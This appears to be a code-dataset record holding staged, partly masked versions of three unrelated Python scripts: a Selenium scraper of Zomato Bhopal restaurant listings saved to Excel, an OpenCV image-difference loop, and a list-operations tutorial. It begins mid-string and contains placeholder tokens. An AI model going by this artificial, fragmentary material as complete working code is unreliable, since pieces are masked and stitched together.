Finished')\nbook.save('ZomatoBhopal(data).xls')\n",
"step-3": "<mask token>\nbook = xlwt.Workbook(encoding='utf-8')\nsheet1 = book.add_sheet('Sheet 1')\nbrowser = webdriver.Firefox()\nbrowser.get('https://www.zomato.com/bhopal/dinner')\nz_hotel_list = []\nz_address_list = []\nz_phone_list = []\nz_rating_list = []\nz_costoftwo = []\nz_votes = []\nz_hours = []\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\ntraverse(1, 6)\ntraverse(6, 11)\ntraverse(11, 16)\ntraverse(16, 21)\ntraverse(21, 26)\nfor i in range(0, len(z_hotel_list), 1):\n sheet1.write(i, 0, z_hotel_list[i])\nfor i in range(0, len(z_phone_list), 1):\n sheet1.write(i, 1, z_phone_list[i])\nfor i in range(0, len(z_address_list), 1):\n sheet1.write(i, 2, z_address_list[i])\nfor i in range(0, len(z_rating_list)):\n sheet1.write(i, 3, z_rating_list[i])\nfor i in range(0, len(z_costoftwo)):\n sheet1.write(i, 4, z_costoftwo[i])\nfor i in range(0, len(z_hours)):\n sheet1.write(i, 5, z_hours[i])\nfor i in range(0, len(z_votes)):\n sheet1.write(i, 6, z_votes[i])\nprint('Writing to excel Finished')\nbook.save('ZomatoBhopal(data).xls')\n",
"step-4": "from selenium import webdriver\nimport time\nimport xlwt\nfrom JD_PhoneNo import get_phone_no\nbook = xlwt.Workbook(encoding='utf-8')\nsheet1 = book.add_sheet('Sheet 1')\nbrowser = webdriver.Firefox()\nbrowser.get('https://www.zomato.com/bhopal/dinner')\nz_hotel_list = []\nz_address_list = []\nz_phone_list = []\nz_rating_list = []\nz_costoftwo = []\nz_votes = []\nz_hours = []\n\n\ndef traverse(a, b):\n temp = []\n for i in range(a, b, 1):\n a = str(i)\n button = browser.find_element_by_link_text(a)\n button.click()\n name_list = browser.find_elements_by_class_name(\n 'result-title.hover_feedback.zred.bold.ln24.fontsize0')\n add_list = browser.find_elements_by_class_name(\n 'col-m-16.search-result-address.grey-text.nowrap.ln22')\n phone_list = browser.find_elements_by_class_name(\n 'item.res-snippet-ph-info')\n for i in range(1, 18):\n if i == 4 or i == 10:\n continue\n else:\n try:\n z_costoftwo.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[2]/span[2]').text)\n except Exception as e:\n z_costoftwo.append('NILL')\n try:\n z_hours.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[3]/div[3]/div[1]').text)\n except Exception as e1:\n z_hours.append('NILL')\n try:\n z_votes.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span'\n ).text)\n except Exception as e1:\n z_votes.append('NEW')\n try:\n z_rating_list.append(browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div['\n + str(i) +\n ']/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]'\n ).text)\n except Exception as e:\n z_rating_list.append('NILL')\n for names in name_list:\n z_hotel_list.append(names.text)\n temp.append(names.text)\n for addname in add_list:\n z_address_list.append(addname.text)\n for phonename in phone_list:\n z_phone_list.append(phonename.get_attribute('data-phone-no-str'))\n if int(a) < 6:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]'\n )\n clk.click()\n else:\n clk = browser.find_element_by_xpath(\n '/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]'\n )\n clk.click()\n\n\ntraverse(1, 6)\ntraverse(6, 11)\ntraverse(11, 16)\ntraverse(16, 21)\ntraverse(21, 26)\nfor i in range(0, len(z_hotel_list), 1):\n sheet1.write(i, 0, z_hotel_list[i])\nfor i in range(0, len(z_phone_list), 1):\n sheet1.write(i, 1, z_phone_list[i])\nfor i in range(0, len(z_address_list), 1):\n sheet1.write(i, 2, z_address_list[i])\nfor i in range(0, len(z_rating_list)):\n sheet1.write(i, 3, z_rating_list[i])\nfor i in range(0, len(z_costoftwo)):\n sheet1.write(i, 4, z_costoftwo[i])\nfor i in range(0, len(z_hours)):\n sheet1.write(i, 5, z_hours[i])\nfor i in range(0, len(z_votes)):\n sheet1.write(i, 6, z_votes[i])\nprint('Writing to excel Finished')\nbook.save('ZomatoBhopal(data).xls')\n",
"step-5": "from selenium import webdriver\r\nimport time\r\nimport xlwt\r\nfrom JD_PhoneNo import get_phone_no\r\nbook = xlwt.Workbook(encoding=\"utf-8\")\r\nsheet1=book.add_sheet(\"Sheet 1\")\r\nbrowser = webdriver.Firefox()\r\nbrowser.get(\"https://www.zomato.com/bhopal/dinner\")\r\nz_hotel_list = []\r\nz_address_list = []\r\nz_phone_list = []\r\nz_rating_list = []\r\nz_costoftwo = []\r\nz_votes = []\r\nz_hours = []\r\n\r\ndef traverse(a,b):\r\n temp = []\r\n for i in range(a,b,1):\r\n a = str(i)\r\n button = browser.find_element_by_link_text(a)\r\n button.click()\r\n name_list = browser.find_elements_by_class_name(\"result-title.hover_feedback.zred.bold.ln24.fontsize0\")\r\n add_list = browser.find_elements_by_class_name(\"col-m-16.search-result-address.grey-text.nowrap.ln22\")\r\n phone_list = browser.find_elements_by_class_name(\"item.res-snippet-ph-info\")\r\n for i in range(1,18):\r\n if(i==4 or i==10 ):\r\n continue\r\n else:\r\n try:\r\n z_costoftwo.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[3]/div[2]/span[2]\").text)\r\n except Exception as e:\r\n z_costoftwo.append(\"NILL\")\r\n try:\r\n z_hours.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[3]/div[3]/div[1]\").text)\r\n except Exception as e1:\r\n z_hours.append(\"NILL\")\r\n try:\r\n z_votes.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/span\").text)\r\n except Exception as e1:\r\n z_votes.append(\"NEW\")\r\n try:\r\n z_rating_list.append(browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[1]/div[3]/div[\"+str(i)+\"]/div[1]/div/article/div[1]/div/div[2]/div[1]/div[2]/div[1]\").text)\r\n except Exception as e:\r\n z_rating_list.append(\"NILL\")\r\n for names in name_list:\r\n z_hotel_list.append(names.text)\r\n temp.append(names.text)\r\n for addname in add_list:\r\n z_address_list.append(addname.text)\r\n for phonename in phone_list:\r\n z_phone_list.append(phonename.get_attribute(\"data-phone-no-str\"))\r\n if(int(a)<6):\r\n clk = browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[7]\")\r\n clk.click()\r\n else:\r\n clk = browser.find_element_by_xpath(\"/html/body/section/div/div[2]/div[3]/div[2]/div/div[6]/div/div[1]/section/div[2]/div[1]/div[2]/div/div/a[8]\")\r\n clk.click()\r\ntraverse(1,6)\r\ntraverse(6,11)\r\ntraverse(11,16)\r\ntraverse(16,21)\r\ntraverse(21,26)\r\n# traverse(26,31)\r\n# traverse(31,36)\r\n# traverse(36,41)\r\n# traverse(41,46)\r\n# traverse(46,51)\r\n# traverse(51,56)\r\n# for i in range(1,5,10):\r\n# traverse(i,i+5)\r\n# traverse(i+5,i+10)\r\nfor i in range(0,len(z_hotel_list),1):\r\n sheet1.write(i,0,z_hotel_list[i])\r\nfor i in range(0, len(z_phone_list), 1):\r\n sheet1.write(i,1,z_phone_list[i])\r\nfor i in range(0, len(z_address_list), 1):\r\n sheet1.write(i, 2, z_address_list[i])\r\nfor i in range(0,len(z_rating_list)):\r\n sheet1.write(i,3,z_rating_list[i])\r\nfor i in range(0, len(z_costoftwo)):\r\n sheet1.write(i, 4, z_costoftwo[i])\r\nfor i in range(0, len(z_hours)):\r\n sheet1.write(i, 5, z_hours[i])\r\nfor i in range(0, len(z_votes)):\r\n sheet1.write(i, 6, z_votes[i])\r\n\r\nprint(\"Writing to excel Finished\")\r\nbook.save(\"ZomatoBhopal(data).xls\")\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
[
1,
2,
3,
4,
5
] |
<|reserved_special_token_0|>
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + 'dd.jpg', img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
<|reserved_special_token_0|>
img1 = cv2.imread('img0008.jpg')
img2 = cv2.imread('img0009.jpg')
img3 = np.zeros(img1.shape)
iter = 51
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + 'dd.jpg', img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
img1 = cv2.imread('img0008.jpg')
img2 = cv2.imread('img0009.jpg')
img3 = np.zeros(img1.shape)
iter = 51
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0] - 1):
for y in range(img1.shape[1] - 1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + 'dd.jpg', img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
<|reserved_special_token_1|>
import cv2
import numpy as np
img1 = cv2.imread('img0008.jpg')
img2 = cv2.imread('img0009.jpg')
#img3 = cv2.imread('img0009.jpg')
img3 = np.zeros(img1.shape)
iter = 51
def sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):
suma = 0
x = ux - wx
y = uy - wy
while x < ux + wx:
while y < uy + wy:
xdx = x + dx if x + dx < img1.shape[0] else x
ydy = y + dy if y + dy < img1.shape[1] else y
suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)
y += 1
x += 1
return suma
def hazFuncion(iteracion):
for x in range(img1.shape[0]-1):
for y in range(img1.shape[1]-1):
img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)
for x in range(iter):
img3 = np.zeros(img1.shape)
hazFuncion(x)
if x % 10 == 0:
#cv2.imwrite("s"+str(x)+"xy.jpg", img3)
cv2.namedWindow(str(x) + "dd.jpg", cv2.WINDOW_NORMAL)
cv2.imshow(str(x) + "dd.jpg", img3)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
flexible
|
{
"blob_id": "749e6a1f807843c9e2591f51561174cc51668b11",
"index": 1588,
"step-1": "<mask token>\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + 'dd.jpg', img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n",
"step-3": "<mask token>\nimg1 = cv2.imread('img0008.jpg')\nimg2 = cv2.imread('img0009.jpg')\nimg3 = np.zeros(img1.shape)\niter = 51\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + 'dd.jpg', img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n",
"step-4": "import cv2\nimport numpy as np\nimg1 = cv2.imread('img0008.jpg')\nimg2 = cv2.imread('img0009.jpg')\nimg3 = np.zeros(img1.shape)\niter = 51\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0] - 1):\n for y in range(img1.shape[1] - 1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n cv2.namedWindow(str(x) + 'dd.jpg', cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + 'dd.jpg', img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n",
"step-5": "import cv2\nimport numpy as np\nimg1 = cv2.imread('img0008.jpg')\nimg2 = cv2.imread('img0009.jpg')\n#img3 = cv2.imread('img0009.jpg')\nimg3 = np.zeros(img1.shape)\niter = 51\n\n\ndef sumas(ux, uy, wx, wy, dx, dy, img_i, img_j):\n suma = 0\n x = ux - wx\n y = uy - wy\n while x < ux + wx:\n while y < uy + wy:\n xdx = x + dx if x + dx < img1.shape[0] else x\n ydy = y + dy if y + dy < img1.shape[1] else y\n suma += np.power(img_i[x][y] - img_j[xdx][ydy], 2)\n y += 1\n x += 1\n return suma\n\n\ndef hazFuncion(iteracion):\n for x in range(img1.shape[0]-1):\n for y in range(img1.shape[1]-1):\n img3[x][y] = sumas(x, y, 1, 1, iteracion, iteracion, img1, img2)\n\n\nfor x in range(iter):\n img3 = np.zeros(img1.shape)\n hazFuncion(x)\n if x % 10 == 0:\n #cv2.imwrite(\"s\"+str(x)+\"xy.jpg\", img3)\n cv2.namedWindow(str(x) + \"dd.jpg\", cv2.WINDOW_NORMAL)\n cv2.imshow(str(x) + \"dd.jpg\", img3)\n cv2.waitKey(0)\n cv2.destroyAllWindows()\n\n\n\n\n\n\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# Lists are sequence of objects
# Mutable
# Lists are represented within square brackets and items are seperated by commas
#-----------------------------------Lists-----------------------------------#
# Lists of Numbers
print("\n1. Lists of Numbers")
print("\t" + str([1,2,3]))
# Lists of Strings
print("\n2. Lists of Strings")
print("\t" + str(["Lemon","Mango","Papaya"]))
list_fruits =["Lemon","Mango","Papaya"]
print("\tMy favorite fruit is " + list_fruits[1])
print("\n3. List operations")
#Replace items within list
list_fruits[2]="Water Melons"
print("\tNew List: " + str(list_fruits))
#Create Empty List
list_Organizations = []
print("\n5. Create empty list")
print("\tList of Organizations: " + str(list_Organizations))
#Add values to list
print("\n5. Add values to list")
list_Organizations.append("Microsoft")
list_Organizations.append("Amazon")
list_Organizations.append("Google")
print("\tAppend List of Organizations: " + str(list_Organizations))
#List of characters within string
print("\tList of characters in string:" + str(list("Sandeep Dhamale")))
# Retrieve List using for loop
print("\n6. Retrieve List using for loop")
for organization in list_Organizations:
print("\t" + organization)
# Get specific elements within list: Slicing
print("\n7. Get specific elements within list: Slicing")
list_numbers = [1,2,3,4,5]
sub_list_numbers = list_numbers[1:3]
print("\tSub list: " + str(sub_list_numbers))
print("\tLast element in list: " + str(list_numbers[-1]))
print("\tGet all elements in list except first and lasr: " + str(list_numbers[1:-1]))
print("\tElements from index 2 in list: " + str(list_numbers[2:]))
print("\tElements till index 4 in list: " + str(list_numbers[:4]))
#Copying Lists to other list - Shallow copy
print("\n8. Copying Lists to other list")
list_numbers_direct = list_numbers
print("\tUsing assignment. Is list_numbers_direct is list_numbers " + str(list_numbers_direct is list_numbers))
list_numbers_list_values = list_numbers[:]
print("\tUsing assignment. Is list_numbers_list_values is list_numbers " + str(list_numbers_list_values is list_numbers))
list_numbers_copy = list_numbers.copy()
print("\tUsing assignment. Is list_numbers_copy is list_numbers " + str(list_numbers_copy is list_numbers))
list_numbers_list = list(list_numbers)
print("\tUsing assignment. Is list_numbers_list is list_numbers " + str(list_numbers_list is list_numbers))
print("\n9. Note: Although the copies are not equal the objects inside the lists are equal")
list_of_list = [[1,2],[3,4]]
copy_list_of_list = list_of_list[:]
print("\tcopy_list_of_list is list_of_list: " + str(copy_list_of_list is list_of_list))
print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0]))
print("\tEven if the values are modified e.g. append the list will be same")
list_of_list[0].append('a')
print("\tlist_of_list: " + str(list_of_list))
print("\tcopy_list_of_list: " + str(copy_list_of_list))
print("\tcopy_list_of_list[element] is list_of_list[element]: " + str(copy_list_of_list[0] is list_of_list[0]))
print("\n10.Search in a list: list.index() - Returns the first matched element")
temp_string = "Python is easy scripting language. It is easy to learn and build apps using Python."
temp_string_list = temp_string.split(" ")
print("\tString: " + temp_string)
print("\tString list: " + str(temp_string_list))
print("\tSearch a sub string in string list using list.index(): " + str(temp_string_list.index("scripting")))
print("\n11.Count occurrence of substring in list")
print("\tCount occurrence of substring Python: " + str(temp_string_list.count("easy")))
print("\n12.Remove substring from string list")
del temp_string_list[3]
print("\tA. Remove substring from list using del (by index): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))
temp_string_list.remove("learn")
print("\tB. Remove substring from list using remove (by value): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))
print("\n12.Insert a substring in string. list.insert()")
temp_string_list.insert(3, "scripting")
print("\tA. Insert substring to list (at index): " + str(temp_string_list))
print("\tOriginal string is unaffected: " + str(temp_string))
print("\n13.Concatenating lists.")
temp_list_1=[1,2,3]
temp_list_2 = [4,5,6]
temp_list = temp_list_1 + temp_list_2
print("\ta. temp_list = temp_list_1 + temp_list_2 = " + str(temp_list))
temp_list+=temp_list
print("\tb. temp_list += temp_list " + str(temp_list))
temp_list.extend([7,8,9])
print("\tc. temp_list.extend() " + str(temp_list))
print("\n14. Reversing lists.")
temp_list.reverse()
print("Reverse temp list: "+ str(temp_list))
print("\n15. Sorting lists.")
temp_list = [5,55,555]
temp_list.sort()
print("\tSorted list: " + str(temp_list))
temp_list.sort(reverse=True)
print("\tSorted list: " + str(temp_list))
print("\tSorting lists by callable functions (inbuilt) e.g. len using 'key")
temp_string = "I am a software tester."
temp_string_list = temp_string.split()
print("\tString list: " + str(temp_string_list))
temp_string_list.sort(key=len)
print("\tSort by length of each word: " + str(temp_string_list))
temp_number_list=[3,45,12,1,99,44]
print("\n16. Using Sorted (copy of sort) instead of sort. and reversed to avoid modifications in original list.")
x=[4, 9, 2, 1]
y = x
y.sort()
print("\t y= " + str(y))
print("\t x= " + str(x))
x=[4, 9, 2, 1]
print("\t y= " + str(sorted(x)))
print("\t x= " + str(x))
print("\t z= " + str(list(reversed(x))))
print("\t x= " + str(x))
|
normal
|
{
"blob_id": "4d35bb83378805daf4392a1752386ab1403404e0",
"index": 1530,
"step-1": "<mask token>\n",
"step-2": "print(\"\"\"\n1. Lists of Numbers\"\"\")\nprint('\\t' + str([1, 2, 3]))\nprint(\"\"\"\n2. Lists of Strings\"\"\")\nprint('\\t' + str(['Lemon', 'Mango', 'Papaya']))\n<mask token>\nprint('\\tMy favorite fruit is ' + list_fruits[1])\nprint(\"\"\"\n3. List operations\"\"\")\n<mask token>\nprint('\\tNew List: ' + str(list_fruits))\n<mask token>\nprint(\"\"\"\n5. Create empty list\"\"\")\nprint('\\tList of Organizations: ' + str(list_Organizations))\nprint(\"\"\"\n5. Add values to list\"\"\")\nlist_Organizations.append('Microsoft')\nlist_Organizations.append('Amazon')\nlist_Organizations.append('Google')\nprint('\\tAppend List of Organizations: ' + str(list_Organizations))\nprint('\\tList of characters in string:' + str(list('Sandeep Dhamale')))\nprint(\"\"\"\n6. Retrieve List using for loop\"\"\")\nfor organization in list_Organizations:\n print('\\t' + organization)\nprint(\"\"\"\n7. Get specific elements within list: Slicing\"\"\")\n<mask token>\nprint('\\tSub list: ' + str(sub_list_numbers))\nprint('\\tLast element in list: ' + str(list_numbers[-1]))\nprint('\\tGet all elements in list except first and lasr: ' + str(\n list_numbers[1:-1]))\nprint('\\tElements from index 2 in list: ' + str(list_numbers[2:]))\nprint('\\tElements till index 4 in list: ' + str(list_numbers[:4]))\nprint(\"\"\"\n8. Copying Lists to other list\"\"\")\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_direct is list_numbers ' + str(\n list_numbers_direct is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list_values is list_numbers ' +\n str(list_numbers_list_values is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_copy is list_numbers ' + str(\n list_numbers_copy is list_numbers))\n<mask token>\nprint('\\tUsing assignment. Is list_numbers_list is list_numbers ' + str(\n list_numbers_list is list_numbers))\nprint(\n \"\"\"\n9. Note: Although the copies are not equal the objects inside the lists are equal\"\"\"\n )\n<mask token>\nprint('\\tcopy_list_of_list is list_of_list: ' + str(copy_list_of_list is\n list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint('\\tEven if the values are modified e.g. append the list will be same')\nlist_of_list[0].append('a')\nprint('\\tlist_of_list: ' + str(list_of_list))\nprint('\\tcopy_list_of_list: ' + str(copy_list_of_list))\nprint('\\tcopy_list_of_list[element] is list_of_list[element]: ' + str(\n copy_list_of_list[0] is list_of_list[0]))\nprint(\n \"\"\"\n10.Search in a list: list.index() - Returns the first matched element\"\"\"\n )\n<mask token>\nprint('\\tString: ' + temp_string)\nprint('\\tString list: ' + str(temp_string_list))\nprint('\\tSearch a sub string in string list using list.index(): ' + str(\n temp_string_list.index('scripting')))\nprint(\"\"\"\n11.Count occurrence of substring in list\"\"\")\nprint('\\tCount occurrence of substring Python: ' + str(temp_string_list.\n count('easy')))\nprint(\"\"\"\n12.Remove substring from string list\"\"\")\ndel temp_string_list[3]\nprint('\\tA. Remove substring from list using del (by index): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\ntemp_string_list.remove('learn')\nprint('\\tB. Remove substring from list using remove (by value): ' + str(\n temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n12.Insert a substring in string. list.insert()\"\"\")\ntemp_string_list.insert(3, 'scripting')\nprint('\\tA. Insert substring to list (at index): ' + str(temp_string_list))\nprint('\\tOriginal string is unaffected: ' + str(temp_string))\nprint(\"\"\"\n13.Concatenating lists.\"\"\")\n<mask token>\nprint('\\ta. temp_list = temp_list_1 + temp_list_2 = ' + str(temp_list))\ntemp_list += temp_list\nprint('\\tb. temp_list += temp_list ' + str(temp_list))\ntemp_list.extend([7, 8, 9])\nprint('\\tc. temp_list.extend() ' + str(temp_list))\nprint(\"\"\"\n14. Reversing lists.\"\"\")\ntemp_list.reverse()\nprint('Reverse temp list: ' + str(temp_list))\nprint(\"\"\"\n15. Sorting lists.\"\"\")\n<mask token>\ntemp_list.sort()\nprint('\\tSorted list: ' + str(temp_list))\ntemp_list.sort(reverse=True)\nprint('\\tSorted list: ' + str(temp_list))\nprint(\"\\tSorting lists by callable functions (inbuilt) e.g. len using 'key\")\n<mask token>\nprint('\\tString list: ' + 